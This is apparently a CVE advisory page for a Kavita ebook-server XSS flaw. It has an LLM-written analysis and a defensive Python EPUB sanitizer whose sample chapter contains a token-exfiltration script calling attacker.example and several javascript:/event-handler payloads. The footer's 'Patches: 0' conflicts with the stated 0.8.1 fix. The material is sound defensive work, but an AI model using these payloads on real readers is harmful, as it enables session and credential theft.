CVE-2024-39307
Description
Kavita is a cross platform reading server. Opening an ebook with malicious scripts inside leads to code execution inside the browsing context. Kavita doesn't sanitize or sandbox the contents of epubs, allowing scripts inside ebooks to execute. This vulnerability was patched in version 0.8.1.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Kavita reading server fails to sanitize or sandbox ebook content, allowing malicious scripts in EPUB files to execute in the user's browser context and perform actions on behalf of the logged-in user.
Vulnerability
Kavita, a cross-platform reading server, does not sanitize or sandbox the contents of EPUB files. This allows malicious scripts embedded within ebooks to execute in the browsing context of the user who opens the file [1]. The root cause is the lack of any content security measures for ebook rendering, enabling arbitrary JavaScript execution.
Exploitation
An attacker crafts an EPUB whose content documents carry a script, for example one that reads the user's authentication token from localStorage and then calls the Kavita API with it [1]. The only precondition is that a logged-in Kavita user opens the crafted ebook in the web reader; no further authentication or interaction is needed. Such files could be distributed through pirate sites or online conversion services [1].
Impact
Once it runs, the script can perform any action the logged-in user can through the Kavita API, including leaking sensitive configuration data such as SMTP credentials [1]. Because Kavita's API surface is limited, this does not lead to remote code execution on the server itself; the impact is confined to what the victim's session can do, so the damage scales with the victim's privileges.
Mitigation
The vulnerability has been patched in Kavita version 0.8.1 [1]. Users are advised to update to that version or later. Until the server is upgraded, EPUBs from untrusted sources should not be opened in the web reader, least of all from an administrator account, since the script inherits that account's API access.
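The following added example (not Kavita's code, and not the 0.8.1 fix itself) makes concrete what the Vulnerability section means by "sanitize" and what a defender can do before upgrading: it scans the XHTML content documents inside an EPUB for active content (script elements, on* event handlers, javascript:/data: URLs) and strips it with an allowlist sanitizer built on Python's stdlib HTML tokenizer. The allowed element and attribute sets, the localStorage key name in the sample payload, and the in-memory EPUB are all assumptions made for the example.

```python
"""Scan EPUB content documents for active content and strip it with an
allowlist sanitizer. Added example, standard library only; not Kavita's code."""
import html
import io
import zipfile
from html.parser import HTMLParser

# Elements dropped together with everything inside them (allowlist chosen here).
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "svg",
                     "math", "noscript", "template", "form"}
# Elements that survive; anything else is unwrapped (tag dropped, text kept).
ALLOWED_TAGS = {"html", "head", "body", "title", "p", "div", "span", "h1", "h2",
                "h3", "h4", "h5", "h6", "ul", "ol", "li", "em", "strong", "i", "b",
                "br", "hr", "img", "a", "blockquote", "pre", "code", "table", "tr",
                "td", "th", "thead", "tbody", "section", "sup", "sub"}
ALLOWED_ATTRS = {"id", "class", "href", "src", "alt", "title", "colspan", "rowspan"}
VOID = {"br", "hr", "img"}
SAFE_SCHEMES = {"http", "https", "mailto"}
C0_AND_SPACE = "".join(chr(i) for i in range(0x21))

def url_ok(value):
    """Accept relative references and http/https/mailto; reject javascript:, data:
    and the rest. Tabs/newlines and leading control characters are removed first
    because browsers ignore them when they parse the scheme."""
    v = "".join(ch for ch in value if ch not in "\t\r\n").strip(C0_AND_SPACE)
    head = v.split("/", 1)[0].split("?", 1)[0].split("#", 1)[0]
    if ":" not in head:
        return True                      # no scheme: relative reference
    return head.split(":", 1)[0].lower() in SAFE_SCHEMES

class EpubSanitizer(HTMLParser):
    def __init__(self):
        super().__init__()               # convert_charrefs=True: text arrives decoded
        self.out = []                    # sanitized markup pieces
        self.findings = []               # what was removed, for the scan report
        self.skipping = []               # stack of elements currently being dropped

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.findings.append(f"element <{tag}> removed")
            self.skipping.append(tag)
            return
        if self.skipping:
            return
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"element <{tag}> unwrapped")
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):    # onload, onerror, onmouseover, ...
                self.findings.append(f"event handler {name} on <{tag}> removed")
                continue
            if name not in ALLOWED_ATTRS:
                continue                 # e.g. xmlns, style: dropped silently
            if name in ("href", "src") and not url_ok(value):
                self.findings.append(f"unsafe {name}={value!r} on <{tag}> removed")
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):   # XHTML self-closing form <br/>
        self.handle_starttag(tag, attrs)
        if tag not in VOID:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if self.skipping:
            if tag == self.skipping[-1]:
                self.skipping.pop()
            return
        if tag in ALLOWED_TAGS and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(html.escape(data, quote=False))
    # comments, <!DOCTYPE> and <?xml ?> reach the base class and are dropped

def sanitize_chapter(xhtml):
    """Return (sanitized markup, findings) for one content document."""
    p = EpubSanitizer()
    p.feed(xhtml)
    p.close()
    return "".join(p.out), p.findings

def scan_epub(epub_bytes):
    """Map each content document that carried active content to its findings.
    Shortcut: members are chosen by extension rather than via the OPF manifest."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(epub_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith((".xhtml", ".html", ".htm")):
                _, findings = sanitize_chapter(zf.read(name).decode("utf-8", "replace"))
                if findings:
                    report[name] = findings
    return report

# Constructed sample chapter with the kind of payload the advisory describes
# (token read from localStorage; the storage key 'token' is illustrative).
MALICIOUS_CHAPTER = """<?xml version="1.0" encoding="utf-8"?>
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Chapter 1</title>
<script>fetch('https://attacker.example/c?t=' + localStorage.getItem('token'))</script>
</head><body>
<h1>Chapter 1</h1>
<p onmouseover="alert(1)">Call me <a href="javascript:alert(document.cookie)">Ishmael</a>.</p>
<img src="cover.png" alt="cover" onerror="alert(1)"/>
<p>Some years ago&mdash;never mind how long precisely.</p>
</body></html>"""
BENIGN_CHAPTER = "<html><body><p>Nothing here <a href='ch01.xhtml#top'>yet</a>.</p></body></html>"

def build_epub():
    """Assemble a minimal in-memory EPUB (constructed test data, not a real book)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/epub+zip", compress_type=zipfile.ZIP_STORED)
        zf.writestr("OEBPS/ch01.xhtml", MALICIOUS_CHAPTER)
        zf.writestr("OEBPS/ch02.xhtml", BENIGN_CHAPTER)
    return buf.getvalue()
```

Running `scan_epub(build_epub())` reports only `OEBPS/ch01.xhtml`, with four findings (the script element, two event handlers, and the javascript: link); `sanitize_chapter(MALICIOUS_CHAPTER)` returns the chapter with those removed and the prose, headings and image intact. The sanitizer is deliberately tokenizer-based rather than regex-based, and it rejects by allowlist rather than blocklist, because the payload space (SVG scripts, encoded schemes, handler attributes the author did not think of) is open-ended. A reader that renders untrusted books should pair this with a sandboxed frame or a restrictive Content Security Policy so that anything the sanitizer misses still cannot reach the logged-in session.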
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 1
Patches: 0 (no patches discovered yet)
References: 1
News mentions: 0 (no linked articles in our index yet)